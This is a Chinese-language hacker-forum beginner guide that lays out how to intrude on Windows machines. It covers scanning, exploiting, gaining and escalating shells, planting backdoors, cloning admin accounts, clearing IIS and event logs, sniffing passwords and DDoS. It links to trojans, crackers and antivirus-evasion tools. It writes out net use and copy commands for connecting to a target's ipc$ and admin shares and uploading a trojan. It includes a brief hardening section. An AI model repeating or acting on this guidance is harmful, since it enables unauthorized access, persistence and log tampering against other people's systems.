,杀毒。前提是你要有一定的电脑常识并对你的系统比较了解,才能分别正常与否。如果你自己对电脑
一窍不通,那在论坛别人也很难帮助你。其实就像对付现实中的病毒一样,应该预防为主。杀毒软件和
网络防火墙可以抵御绝大部分危险,自身安全知识的提高则是最根本的保障。最新的病毒相关知识可以
到杀毒软件公司的主页上找。另外,系统不正常也可能是操作失误引起的。这里是“黑客零起点”不是
“电脑零起点”,所以关于系统修复的问题,请不要在论坛提了。
相关工具:
Active Ports 监视自己电脑的端口 http://www.isgrey.com/down/show.asp?id=215&down=1 ;
windows优化大师4.9 它的进程管理功能不错 http://gwbn.onlinedown.net/down/wom49.exe ;
Fport-2.0 查看端口关联的进程 http://www.heibai.net/download/show.php?id=2670&down=1 ;
mport 比fport更胜一筹的工具 http://www.sandflee.net/down/show.asp?id=247&down=1 ;
相关帖子:
关于广外女生木马的手工清除方法 http://www.sandflee.net/txt/list.asp?id=128 ;
把灰鸽子赶尽杀绝 http://www.sandflee.net/txt/list.asp?id=181 ;
清除恶意网页的破坏 http://it.rising.com.cn/default/spclean.htm ;
http://it.rising.com.cn/default/clean.htm ;
对付win2kpass http://www.sandflee.net/cgi-bin/lb5000/topic.cgi?forum=1&topic=10401&show=396
;
2000系统进程总列表 http://www.sandflee.net/cgi-bin/lb5000/topic.cgi?
forum=1&topic=9268&show=748 ;
木马的检测、清除及其预防 http://www.s8s8.net/cgi-bin/topic.cgi?forum=25&topic=17013&show=0
;
关于基础知识和入侵步骤
简单说明:
电脑和网络知识可算是做黑客的基础的基础,至少你要先了解了它们再来看下面的帖子。看完这部分的
帖子,你也只是算站到了“零起点”上,路还长着呢。这里我再多说几句关于入侵步骤的话,给新手做
个引导。所谓入侵,可以理解为未授权的访问。既然是未授权的,就需要借助一些非常规的手段,即通
常所说的利用漏洞。
1,要利用漏洞首先要发现它。端口扫描和漏洞扫描就是“敲门砖”。可以对大量目标做一般扫描,也可
以对单一目标做重点扫描。或者两者结合。当你对漏洞熟悉时,你可以只通过端口扫描就能了解目标的
可能有的漏洞。这样既提高效率又不易被记录日志。
2,找到漏洞后的利用问题,是千差万别的。这正是新手学要学习的地方之一。这里就不多说了。
3,利用漏洞的目的是什么呢?是控制对方,即是获得远程shell。shell这个概念是从UNIX下继承过来的
,是指与操作系统核心的一种交互方式和界面。典型的例子是telnet。得到shell的办法有很多种,比如
通过系统自带的telnet,终端服务。或者用木马和工具提供的,如winshell,冰河等等。
4,shell是有权限差别的。最高权限——管理员权限才是我们的目标。所以有时会有提升权限的问题。
当然,这也是利用了漏洞。
5,有了shell还要扩大它,就是进一步获得更好用的shell。命令行的到图形的、功能少的到多的。于是
才有了“怎么开3389”,“怎么上传”之类问题。
6,为了下次还能控制目标,你需要保持shell。做一个好的后门又是一种“学问”。克隆帐号、埋木马
、破administrator的密码,手段不一而足。各位慢慢学吧。
相关帖子:
如何成为一名黑客 http://www.sometips.com/tips/security/186.htm ;
提问的技巧 http://www.sandflee.net/cgi-bin/lb5000/topic.cgi?forum=1&topic=523 ;
TCP/IP基础介绍 http://article.cnhope.org/list.asp?id=659 ;
网络攻防教程 http://www.netsill.com/wenzhang/list.asp?id=115 ;
网络入侵步骤及思路 http://www.s8s8.net/cgi-bin/topic.cgi?forum=25&topic=14970&show=140 ;
几种扫描器的使用教程 http://www.chinesehack.org/file/show.asp?id=5614 ;
全球ip分配表 http://www.sandflee.net/cgi-bin/lb5000/topic.cgi?
forum=3&topic=54&start=0&show= ;
黑客入门教程 http://www.heibai.net/article/show.php?id=2515 ;
关于命令的使用
简单说明:
windowsNT/2000下有丰富的cmd可供使用,其作用也是巨大的。完全值得去熟练掌握她它们。
windows2000本身就提供了详细的命令帮助。在开始菜单--》帮助中可以搜索到“windows 2000 命令参
考”。强烈建议各位新手花些时间仔细看一遍。装了比如IIS等软件,就会有新的命令(iisreset),在
命令行方式下加/?或-h参数可以查看帮助,其他内置的命令当然也可以。
相关帖子:
ftp命令: http://www.sandflee.net/cgi-bin/lb5000/topic.cgi?forum=3&topic=227&show=75 ;
telnet命令: http://www.heibai.net/article/show.php?id=578 ;
net命令: http://www.sandflee.net/txt/list.asp?id=143 ;
tftp命令: http://www.sandflee.net/cgi-bin/lb5000/topic.cgi?forum=3&topic=32 ;
一般入侵所需要的几个常用命令 http://www.sandflee.net/cgi-bin/lb5000/topic.cgi?
forum=1&topic=4242 ;
关于端口
相关工具:
扫描端口是扫描器的基本功能,工具太多了。看后面的“常用工具的使用”这部分。
相关帖子:
端口扫描简介 http://www.s8s8.net/cgi-bin/topic.cgi?forum=25&topic=15063&show=60 ;
常见端口一览表 http://www.s8s8.net/cgi-bin/topic.cgi?forum=25&topic=14801 ;
常见端口详解及部分攻击策略 http://www.sandflee.net/txt/list.asp?id=116 ;
关于windows98
简单说明:
这类问题有两种:一是怎样入侵win98系统,二是在win98怎样入侵。
由于98对网络的支持不完善,使得问题的解决远没有像对2000那样“丰富多采”。98默认没有什么网络
服务启动,也就找不到什么可利用的漏洞。共享算是最常见的“服务”了。我简单的写了些利用方法放
在这里: http://home.getdns.net/web/eva/98.txt ; 其他还有些方法,比如嗅探密码、发病毒和木马
到信箱、甚至用QQ“联络感情”再传个绑木马的Flash等,没什么意思,就此打住。
基于同样的理由,98不是一个好的攻击平台。如果只是端口扫描,那么superscan可以胜任。web类的漏
洞扫描x-scan也可以。但涉及ipc$的弱口令、漏洞、远程控制工具以及连接一些服务(如sql)就要“基
于NT技术构建”的os了。好在3389终端服务的客户端可以是98,所以先搞一台开3389的肉鸡就算是回避
了问题。如果你还在用98,诚恳的建议你:请用2000。如果你在网吧,先试试入侵网吧服务器。
鉴于98的问题技术含量不高、没有深入探讨价值,所以如果不是特别的问题就请不用发帖了。(个人观
点)
相关工具:
NetPass 1.0 破解98共享密码 http://www.heibai.net/download/show.php?id=1465&down=1 ;
cain v2.5 综合破解工具 http://www.heibai.net/download/show.php?id=2585&down=1 ;
exeBinderZ 1.3 EXE捆绑机 (我用PE压了一下,暂时不会被杀了)
http://www.v86.net/net/file/zzzevazzz/exeBinderZ1.3.zip ;
关于破解邮箱
相关工具:
溯雪 http://www.netxeyes.org/dansnowb7setup.exe ;
溯雪中文补丁 http://www.netxeyes.org/dansnowb7_cn.zip ;(先安装英文版,释放到原英文版目录即
可)
相关帖子:
溯雪破解21cn信箱的完整教程 http://www.heibai.net/download/show.php?id=1263 ;
关于解除网吧、网页限制
破解右键: http://www.sandflee.net/cgi-bin/lb5000/topic.cgi?forum=1&topic=2215&show=1078 ;
破解硬盘还原卡: http://www.heibai.net/article/show.php?id=2488 ;
http://www.heibai.net/article/show.php?id=1939 ;
破解美屏: http://article.cnhope.org/list.asp?id=574 ;
http://www.heibai.net/article/show.php?id=2546 ;
相关网址: http://webmaster.diy.163.com/cy07/ ;
相关工具: 网吧幽灵1.8 http://www.heibai.net/download/show.php?id=2847&down=1 ;
关于流光
简单说明:
流光实在是个十分出色的综合工具。其易用性和实用性都很适合新手使用。还没用过的立刻下载一个装
上,自己体验一下吧。使用前建议看看自带的说明。
相关工具:
流光4.7 http://www.netxeyes.org/fluxay47/fluxay47build3200setup.exe ;
流光4.7破解补丁 http://www.heibai.net/download/show.php?id=2422 ;
常见问题和回答:
1,我下载的流光杀毒软件说有病毒,怎么会事?
答:一些杀毒软件的确认为流光是木马(谁让它这么有名呢,呵呵)。如果杀毒,流光将无法使用,所
以只有让杀毒软件停止监测。或者使用不认为流光是病毒的软件,比如金山毒霸。
2,为什么有些肉鸡安装sensor失败?
答:如果拷贝文件出错,可能是因为目标admin$共享未开放。请采用其他shell,在目标主机上执行net
share admin$命令。
如果启动服务失败,可能因为使用的端口已经被占用,换个试试;也可能目标有杀毒软件删除了文件,
或者有防火墙阻止sensor连网,没有什么好的解决办法。
3,为什么一些流光扫到的密码不能用?
答:可能是误报,将扫描速度降低些再扫。对于winxp目标,也会产生误报。也可能因为你用扫到的非管
理员帐号来连接目标,请在ipc$扫描选项里将“只对administrators组进行猜解”选上。
关于字典
简单说明:
操作系统将用户和密码信息加密后存放在特定的地方和文件中。典型的如windowsNT里的sam文件和Linux
里的etc/passwd。由于加密算法是单向散列的,所以几乎不可能找到逆向算法。因此,不得不使用同样
的算法加密各种口令,将结果去吻合散列值。字典就是有选择地储存了一批口令的文件。例如生日、常
用单词、中文名字的拼音等。著名的破解密码的工具,一般自带一些字典。也可以使用字典工具制作符
合要求的字典。
相关工具:
乱刀 小榕出品,破解UNIX系统的密码 http://www.netxeyes.org/bladese.exe ;
john 最著名的UNIX密码破解工具(windows版) http://www.heibai.net/download/show.php?
id=1595&down=1 ;
producepass 通用字典生成器 http://www.heibai.net/download/show.php?id=2666&down=3 ;
hh_dictall 英文单词大全字典 http://www.heibai.net/download/show.php?id=396&down=1 ;
sr-password 生日密码生成器 http://www.heibai.net/download/show.php?id=2442&down=1 ;
关于ipc$、空连接和默认共享
简单说明:
首先需要指出的是空连接和ipc$是不同的概念。空连接是在没有信任的情况下与服务器建立的会话,换
句话说,它是一个到服务器的匿名访问。ipc$是为了让进程间通信而开放的命名管道,可以通过验证用
户名和密码获得相应的权限。有许多的工具必须用到ipc$。默认共享是为了方便远程管理而开放的共享
,包含了所有的逻辑盘(c$,d$,e$……)和系统目录winnt或windows(admin$)。
相关帖子:
尝试自己解决问题的学习思路 http://www.sandflee.net/txt/list.asp?id=100 ;
IPC进攻方法 http://www.sandflee.net/cgi-bin/lb5000/topic.cgi?forum=1&topic=2498&show=1034 ;
常见问题和回答:
1,怎样建立空连接,它有什么用?
答:使用命令 net use \\IP\ipc$ "" /user:"" 就可以简单地和目标建立一个空连接(需要目标开放
ipc$)。
对于NT,在默认安全设置下,借助空连接可以列举目标用户、共享,访问everyone权限的共享,访问小
部分注册表等,没有什么利用价值。对2000作用就更小了。而且实现也不方便,需借助工具。如果你不
理解“没用”的东西为什么还会存在,就看看“专业”的解释吧:
在NT/2000下的空连接 http://www.3389.net/bbs/dispbbs.asp?
boardID=22&RootID=3424&ID=3424&page=1:
解剖WIN2K下的空会话 http://www.sandflee.net/txt/list.asp?id=117 ;
2,为什么我连不上IPC$?
答:1,只有nt/2000/xp及以上系统才可以建立ipc$。如果你用的是98/me是没有该功能的。
2,确认你的命令没有打错。正确的命令是: net use \\目标IP\ipc$ "密码" /user:"用户名"
注意别多了或少了空格。当用户名和密码中不包含空格时两边的双引号可以省略。空密码用""表示。
3,根据返回的错误号分析原因:
错误号5,拒绝访问 : 很可能你使用的用户不是管理员权限的,先提升权限;
错误号51,Windows 无法找到网络路径 : 网络有问题;
错误号53,找不到网络路径 : ip地址错误;目标未开机;目标lanmanserver服务未启动;目标有防火
墙(端口过滤);
错误号67,找不到网络名 : 你的lanmanworkstation服务未启动;目标删除了ipc$;
错误号1219,提供的凭据与已存在的凭据集冲突 : 你已经和对方建立了一个ipc$,请删除再连。
错误号1326,未知的用户名或错误密码 : 原因很明显了;
错误号1792,试图登录,但是网络登录服务没有启动 : 目标NetLogon服务未启动。(连接域控会出现
此情况)
错误号2242,此用户的密码已经过期 : 目标有帐号策略,强制定期要求更改密码。
4,关于ipc$连不上的问题比较复杂,本论坛没有总结出一个统一的认识,我在肉鸡上实验有时会得出矛
盾的结论,十分棘手。
而且知道了问题所在,如果没有用其他办法获得shell,很多问题依然不能解决。问题过于细致后就不适
合在本文章里探讨了。
各位看着办吧,呵呵。
3,怎样打开目标的IPC$?
答:首先你需要获得一个不依赖于ipc$的shell,比如sql的cmd扩展、telnet、木马。当然,这shell必
须是admin权限的。然后你可以使用shell执行命令 net share ipc$ 来开放目标的ipc$。从上一问题可
以知道,ipc$能否使用还有很多条件。请确认相关服务都已运行,没有就启动它(不知道怎么做的请看
net命令的用法)。还是不行的话(比如有防火墙,杀不了)建议放弃。
4,怎样映射和访问默认共享?
答:使用命令 net use z: \\目标IP\c$ "密码" /user:"用户名" 将对方的c盘映射为自己的z盘,其他
盘类推。
如果已经和目标建立了ipc$,则可以直接用IP加盘符加$访问。比如 copy muma.exe
\\IP\d$\path\muma.exe 。或者再映射也可以,只是不用用户名和密码了:net use y: \\IP\d$ 。然后
copy muma.exe y:\path\muma.exe 。当路径中包含空格时,须用""将路径全引住。
5,如何删除映射和ipc$连接?
答:用命令 net use \\IP\ipc$ /del 删除和一个目标的ipc$连接。
用命令 net use z: /del 删除映射的z盘,其他盘类推。
用命令 net use * /del 删除全部。会有提示要求按y确认。
6,连上ipc$然后我能做什么?
答:能使用管理员权限的帐号成功和目标连接ipc$,表示你可以和对方系统做深入“交流”了。你可以
使用各种命令行方式的工具(比如pstools系列、Win2000SrvReskit、telnethack等)获得目标信息、管
理目标的进程和服务等。如果目标开放了默认共享(没开你就帮他开),你就可以上传木马并运行。也
可以用tftp、ftp的办法上传。像dwrcc、VNC、RemoteAdmin等工具(木马)还具有直接控屏的功能。如
果是2000server,还可以考虑开启终端服务方便控制。这里提到的工具的使用,请看自带的说明或相关
教程。
7,怎样防止别人用ips$和默认共享入侵我?
答:A、一种办法是把ipc$和默认共享都删除了。但重起后还会有。这就需要改注册表。
1,先把已有的删除
net share ipc$ /del
net share admin$ /del
net share c$ /del
…………(有几个删几个)
2,禁止建立空连接
首先运行regedit,找到如下主键
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA]把RestrictAnonymous(DWORD)的键值
改为:00000001。
3,禁止自动打开默认共享
对于server版,找到如下主键
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把
AutoShareServer(DWORD)的键值改为:00000000。
对于pro版,则是
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把
AutoShareWks(DWORD)的键值改为:00000000。
如果上面所说的主键不存在,就新建一个再改键值。
B、另一种是关闭ipc$和默认共享依赖的服务(不推荐)
net stop lanmanserver
可能会有提示说,XXX服务也会关闭是否继续。因为还有些次要的服务依赖于lanmanserver。一般情况按
y继续就可以了。
C、最简单的办法是设置复杂密码,防止通过ipc$穷举密码。但如果你有其他漏洞,ipc$将为进一步入侵
提供方便。
D、还有一个办法就是装防火墙,或者端口过滤。防火墙的方法就不说了,端口过滤看这里:
过配置本地策略来禁止139/445端口的连接 http://www.sandflee.net/txt/list.asp?id=98 ;
关于扫描出的漏洞
简单说明:
很多扫描器都有漏洞扫描功能。当你获得了一些主机的漏洞列表时,不要急着把它们帖在论坛上,期望
别人来为你分析和告诉你利用的方法。你应该首先尝试自己完成这些。扫描出的漏洞并不是都有用的,
一部分漏洞过时了,一部分是误报。
漏洞搜索:
绿盟的引擎 http://security.nsfocus.com/index.php?act=sec_bug ;
补天网的引擎 http://www.patching.net/otherweb/leak/leakindex.asp ;
小凤居的引擎 http://www.chinesehack.org/file/list.asp?无效=2 ;
相关帖子:
CGI漏洞描述 http://www.sandflee.net/txt/list.asp?id=37 ;
IIS ISAPI Printer远程溢出攻击 http://www.sandflee.net/txt/list.asp?id=66 ;
如何利用UNICODE漏洞 http://www.heibai.net/article/show.php?id=2638 ;
Apache HTTP server存在严重漏洞 http://www.sandflee.net/txt/list.asp?id=161 ;
msadcs.dll漏洞的使用方法 http://www.sandflee.net/txt/list.asp?id=115 ;
相关工具:
IISIDQ Snake的IDQ溢出攻击程序 http://www.heibai.net/download/show.php?id=223&down=1 ;
IIS .ida映射溢出程序 http://www.heibai.net/download/show.php?id=1508&down=1 ;
黑客文章经典汇总(二)
关于提升权限
简单说明:
经典的黑客目标就是得到root(即win中的admin)权限。有些漏洞(典型的如Unicode漏洞、ASP木马)
不能直接获得管理员权限,所以必然需要提升权限。一些新手可能会犯这类错误,以为中了木马、获得
了shell就能控制一切。结果就出现“为何不能加用户”、“为何不能开3389”等问题。2000及更高版本
os承袭了NT的安全结构,多重机制环环相扣来保障安全,特别是帐户安全。无奈安全系统过于庞大,多
少会出现漏洞,于是我们就有机会了。
相关工具:
erunasx 利用Debug Registers漏洞提升权限 http://www.sandflee.net/down/show.asp?id=118&down=1
;
自带说明。需要指出的是,它的原理决定了它只能使用一次,不成功(比如打错了字)就必须重起目标
,才能再来。
PipeUpAdmin 对sp1及更低有效 http://www.sandflee.net/down/show.asp?id=25&down=1 ;
ISPC 利用IIS的漏洞,详见自带说明 http://www.heibai.net/download/show.php?id=1532&down=1 ;
相关帖子:
NT/2000提升权限的方法小结 http://www.sandflee.net/txt/list.asp?id=62 ;
Windows NT4的安全结构(对新手有些难,了解一下吧)
http://www.sometips.com/tips/security/184.htm ;
关于做代理和跳板
相关工具:
SocksCap 2.2 SOCKS调度工具 http://www.heibai.net/download/show.php?id=2410&down=1 ;
SkSockServer1.04 代理跳板 http://www.heibai.net/download/show.php?id=1194&down=1 ;
FTP Serv-U 4.0 最常用的ftp服务程序 http://soft.km169.net/soft/html/4237.htm ;
slimftp 隐蔽的ftp服务器 http://www.netsill.com/download/download.asp?Did=1981 ;
天雁WEB服务器 不用安装的小型web服务程序 http://www.netsill.com/download/download.asp?
Did=1979 ;
相关帖子:
代理、肉鸡、跳板的概念 http://www.s8s8.net/cgi-bin/topic.cgi?forum=25&topic=14803&show=300
;
代理服务器(Proxy)完全解析 http://www.sandflee.net/cgi-bin/lb5000/topic.cgi?
forum=1&topic=9092 ;
如何使用代理服务器 http://netschool.ayinfo.ha.cn/rhsydlfwq.htm ;
Sockscap32 结合SnakeSkserver做跳板图解 http://www.sandflee.net/txt/list.asp?id=88 ;
Serv-U设置教程 http://www.enanshan.com/ftp/ ;
SocksCap32 使用详解 http://www.netsill.com/wenzhang/list.asp?id=66 ;
关于终端服务(3389)
简单说明:
windows终端服务提供了通过作为终端仿真器工作的“瘦客户机”软件远程访问服务器桌面的能力。图形
界面和不影响当前本地用户的特性是它的最大优点。由于它是2000server及以上版本自带的功能,因此
成为一个绝好的“后门”而倍受青睐。而且win98也可以成为客户端,这使得在网吧“工作”成为可能。
相关工具:
winxp下的客户端 功能比2000下的更强大 http://www.sandflee.net/down/show.asp?id=67&down=1 ;
终端服务程序的一个补丁 使本地和远程间能复制文本
http://www.sandflee.net/wawa/tools/rdpclip_hotfix.exe ;
web版终端客户端 使用浏览器调用ActiveX控件访问终端服务
http://www.enanshan.com/down/tswebsetup.exe ;
C3389.EXE 修改终端服务端口号的工具 http://www.sandflee.net/down/show.asp?id=228&down=1 ;
Win2k终端服务器端所需文件包 http://www.netsill.com/download/download.asp?Did=1965 ;
相关帖子:
关于远程启动终端服务的帖子 http://www.s8s8.net/cgi-bin/topic.cgi?forum=25&topic=14567 ;
终端服务问题常见问答 http://www.sandflee.net/wawa/3389qa.htm ;
图文讲解输入法漏洞入侵 http://www.sandflee.net/txt/list.asp?id=22 ;
Terminal Service 远程安装 http://article.cnhope.org/list.asp?id=697 ;
其他任何有关3389终端服务的问题都可以到专门的论坛和主页找答案:
http://www.sandflee.net/wawa/ ;
http://www.sandflee.net/cgi-bin/lb5000/forums.cgi?forum=17 ;
请不要在其他分论坛发贴提问。
关于克隆帐号
简单说明:
克隆帐号的原理简单的说是这样:在注册表中有两处保存了帐号的SID相对标志符,一处是
SAM\Domains\Account\Users下的子键名,另一处是该子键的子项F的值中。这里微软犯了个不同步它们
的错误,登陆时用的是后者,查询时用前者。当用admin的F项覆盖其他帐号的F项后,就造成了帐号是管
理员权限但查询还是原来状态的情况。即所谓的克隆帐号。
具体的看这里:解剖安全帐号管理器(SAM)结构 http://www.sandflee.net/cgi-
bin/lb5000/topic.cgi?forum=1&topic=5973 ;
明白原理后就可以手动或者用现成的工具克隆帐号了。
相关工具:
克隆ca.exe http://www.netxeyes.org/CA.exe ;
检查克隆cca.exe http://www.netxeyes.org/CCA.exe ;
手动克隆需要SYSTEM权限,用它 psu.exe http://www.sandflee.net/down/show.asp?id=176&down=1 ;
相关帖子:
工具克隆:ca和cca 请访问作者主页 http://www.netxeyes.org/main.html ;
这里是摘录 http://www.sandflee.net/cgi-bin/lb5000/topic.cgi?forum=1&topic=3374 ;
psu用法:psu.exe提升为system权限 http://www.sandflee.net/cgi-bin/lb5000/topic.cgi?
forum=1&topic=5638 ;
手动克隆:如何克隆管理员帐号 http://www.sandflee.net/txt/list.asp?id=138 ;
如何克隆管理员帐号的补充 http://www.sandflee.net/txt/list.asp?id=139 ;
常见问题和回答:
1,使用ca时,出现connect **.**.**.** ...Error是怎么会事?
答:ca和cca需要目标开放ipc$,请确认可以与目标建立ipc$。参见“关于ipc$和空连接”
2,使用ca时,出现“Processing....ERROR”是怎么会事?
答:这说明对方主机缺少文件msvcp60.dll,想办法传个过去放在系统目录下就可以了。
3,克隆过程没有错误,但cca没有显示该帐号克隆成功,无法使用被克隆的帐号。
答:这一般是因为对方主机是域控制器,注册表中sam结构不同,工具失效。暂时无法解决。
4,手动克隆无法访问注册表SAM键怎么办?
答:在命令行方式,可以使用psu工具获得SYSTEM权限,从而访问SAM键。详见上面说明。
在图形界面,运行regedt32.exe,找到SAM键并选中。“安全”子菜单栏里有一项“权限”,打开它。在
里面设置administrator和SYSTEM一样有完全控制权限。关闭regedt32再打开,就可以访问SAM键了。
关于日志
简单说明:
想要做个隐身人就要把脚印擦干净。windows的许多服务都带日志。最重要和明显的就是IIS和事件日志
。它们最有可能记录你的IP和行动。而且相对于其他的如ftp、计划任务、telnet的日志更为管理员重视
。另外,如果你获得了图形界面的shell来用IE,还可能会留小甜饼。
相关工具:
cleanIISlog 清除web日志 http://www.netxeyes.org/cleaniislog.zip ;
elsave.exe 清除事件日志 http://www.sandflee.net/down/show.asp?id=196 ;
RCLS.vbe 远程清除事件日志的脚本 http://www.v86.net/net/file/zzzevazzz/rcls.zip ;
相关帖子:
NT/2000下删日志的方法 http://www.sandflee.net/txt/list.asp?id=129 ;
windows日志的保护与伪造 http://www.sandflee.net/txt/list.asp?id=182 ;
关于后门和木马
相关工具:
wollf-v1.5 功能挺多的木马 http://www.isgrey.com/down/show.asp?id=144&down=1 ;
WinShell v5.0 精巧的Telnet服务器 http://www.isgrey.com/down/show.asp?id=200&down=1 ;
蓝色火焰V0.5 可以用IE控制的木马 http://www.bluefate.com/bluefire/bluefire050.zip ;
网络神偷 V3.4 反向连接,上线通知 http://www.isgrey.com/down/show.asp?id=239&down=1 ;
HELL v0.4 Lion写的木马兼工具 http://www.heibai.net/download/show.php?id=2449&down=1 ;
相关帖子:
蓝色火焰V0.5介绍 http://www.bluefate.com/bluefire/help.htm ;
网络神偷的介绍,直接去作者的主页找 http://www.greenstuffsoft.com/nethief/article.htm ;
关于打补丁
简单说明:
如果你发现肉鸡有漏洞的话,一般可以用上面提到的漏洞搜索引擎找到相应的补丁下载URL。大的补丁比
如sp2就找微软要吧(windows 更新)。
相关帖子:
肉鸡补丁教程 http://www.sandflee.net/cgi-bin/lb5000/topic.cgi?forum=1&topic=7180 ;
相关工具:
win2000sp3中文版 http://www.cnns.net/msfix/w2ksp3_cn.exe ;
win2000sp3英文版 http://www.cnns.net/msfix/w2ksp3_en.exe ;
Windows2k安全补丁集SRP1 http://www.patching.net/otherweb/software/viewarticle.asp?id=1570 ;
关于telnet
简单说明:
telnet是一种命令行方式的终端服务,其优势在于客户端和服务端都是系统自带的。它是除了木马外,
获得cmd下shell的最好选择。使用该服务时,最常遇到的问题就是NTLM认证方式。当NTLM=2时,要求你
必须使用你系统当前的帐户和密码登陆;当NTLM=0时直接要求你输入帐户及密码进行验证;NTLM=1则是
前一种要求失败后再用后一种。由于系统默认的NTLM为2,所以想用你得到的帐户登陆,要么在自己系统
上也建立一个用户名密码都一样的帐户,要么想办法更改对方的NTLM。
相关工具:
telnethack 远程开启telnet服务 http://www.heibai.net/download/show.php?id=2200&down=1 ;
RTCS.vbe 远程开telnet的脚本 http://www.v86.net/net/file/zzzevazzz/rtcs.zip ;
相关帖子:
最快速登录WIN2K TELNET 服务 http://www.sandflee.net/txt/list.asp?id=58 ;
不需工具远程屏蔽telnet服务的ntlm认证 http://www.sandflee.net/cgi-bin/lb5000/topic.cgi?
forum=1&topic=8608&show=1012 ;
关于ftp入侵
简单说明:
ftp是文件传输协议的缩写,现在一般指一种文件传输方式。要通过它入侵实在是有些勉为其难了。即使
得到上传权限也无法直接执行程序,利用办法可以参考win98共享的入侵。一些较早版本的ftp服务软件
,尤其是UNIX平台上的,有溢出或越权访问的漏洞,相关信息请查看后面关于漏洞的部分。
相关帖子:
允许匿名登陆ftp服务器危险性研究 http://www.heibai.net/article/show.php?id=2094 ;
关于sql
简单说明:
sql的原意是Structured Query Language,结构化查询语言。现一般指代数据库软件或服务。流行的数
据库软件是ms-sql,一般服务器上都由它提供数据库服务。以下的讨论都是针对它的。由于具有管理员
权限的帐号sa默认密码为空,且低版本的sql有漏洞能直接获得密码。因此它也成为入侵的一种捷径(如
果存在漏洞的话)。用客户端工具连接后直接当cmd用吧。
相关工具:
mssqltools 攻击sql的工具集 http://www.haowawa.com/down/att/mssqltools.zip ;
SuperSQL执行 mssql连接工具 http://www.sandflee.net/down/show.asp?id=142&down=1 ;
相关帖子:
去除SA的xp_cmdshell权限 http://www.sandflee.net/txt/list.asp?id=148 ;
dos下如何改sql密码 http://www.sandflee.net/cgi-bin/lb5000/topic.cgi?
forum=1&topic=8623&show=1034 ;
sql扩展的删除与恢复 http://www.haowawa.com/bbs/dispbbs.asp?
boardID=12&RootID=16971&ID=16971&page=1 ;
SQL完全简明手册 http://www.patching.net/otherweb/works/viewarticle.asp?id=1513 ;
关于sniffer
相关工具:
ARPSniffer 基于交换环境的Sniffer工具 http://www.netxeyes.org/ARPSniffer.rar ;
SnifferPRO4.6 最好的嗅探器之一 http://www.sandflee.net/down/show.asp?id=237&down=1 ;
commview 也是嗅探器 http://www.skycn.com/download.php?
id=1351&url=http://lnhttp.skycn.net/down/cv3.zip ;
ARPKiller1.3 可以查谁在嗅探(网卡处在混杂模式) http://www.heibai.net/download/show.php?
id=2547&down=1 ;
pswmonitor2.0 监听基于网页的邮箱密码(很适合在网吧使用)
http://www.heibai.net/download/show.php?id=2181&down=1 ;
GUNiffer 命令行方式的嗅探工具 http://haowawa.com/down/GUNiffer.exe ;
相关帖子:
sniffer简述 http://www.sandflee.net/txt/list.asp?id=177 ;
网络监听技术概览 http://www-900.ibm.com/developerWorks/cn/security/se-sniff/index.shtml ;
NetXray使用说明总汇 http://www.heibai.net/article/show.php?id=1620 ;
如何在交换环境下SNIFFER http://www.netxeyes.org/arpsniffer.html ;
Windows 交换环境下ARP Sniffer的实现 http://www.netxeyes.org/arpspoof.html ;
关于DoS和DDos
简单说明:
拒绝服务攻击只在很特殊的情况才有应用价值。它完全是一种破坏和令人厌恶的行为。因此十分不推荐
新手尝试。各位了解一下它的原理就可以了。
相关工具:
独裁者 DDos工具 http://www.leothreads.com/usr/25/25_18196.zip ;
三个ddos工具 http://www.heibai.net/download/show.php?id=2706&down=1 ;
相关帖子:
DOS攻击原理以及常见方法介绍 http://www.heibai.net/article/show.php?id=1724 ;
典型DoS攻击原理及抵御措施 http://www.heibai.net/article/show.php?id=1523 ;
分布式拒绝服务攻击(DDoS)原理及防范 http://www-900.ibm.com/developerWorks/cn/security/se-
ddos/index.shtml ;
DoS,DDOS(拒绝服务)攻防简明问答 http://www.chinesehack.org/file/show.asp?id=4876 ;
独裁者(Autocrat)教程 http://www.s8s8.net/cgi-bin/topic.cgi?forum=25&topic=17639&show=0 ;
关于UNIX/Linux
简单说明:
UNIX/Linux无疑是比windows更历史悠久更出色的OS。可惜缺少了一些“平易近人”,让许多人望而却步
。这里也不打算讲些什么,想学它的人不如从学习怎么找相关资料开始吧,呵呵。
相关帖子:
给初学者的入侵FAQ http://article.cnhope.org/list.asp?id=308 ;
rootkit综述 http://www.patching.net/otherweb/works/viewarticle.asp?id=1592 ;
相关网址:
Linux相关网站集 http://chenbol.myetang.com/remen.htm ;
关于常用工具的使用
简单说明:
黑客的工具就像战士的枪,一定要熟练掌握灵活应用。这里给出一些常用的工具方便新手下载。其他工
具还是自己搜一下吧。一般命令行下的工具是自带简单的使用说明(即usage)的,当输入错误参数或不
输参数就会显示。不要因为帮助是英文的就放弃学习。给出的软件使用教程,总会有没讲到或讲的不够
细致的地方。遇到问题请首先尝试自己解决。实在不行的话,就请把握住问题的要点,清楚地表达出来
。
相关工具:
命令行工具:
Shutdown.exe 远程重起的小工具 http://www.sandflee.net/down/show.asp?id=109&down=1 ;
pstools系列工具 包括pslist,pskill,psinfo等实用的工具 http://haowawa.com/down/pstools.zip ;
内有英文说明,比较易懂。
S
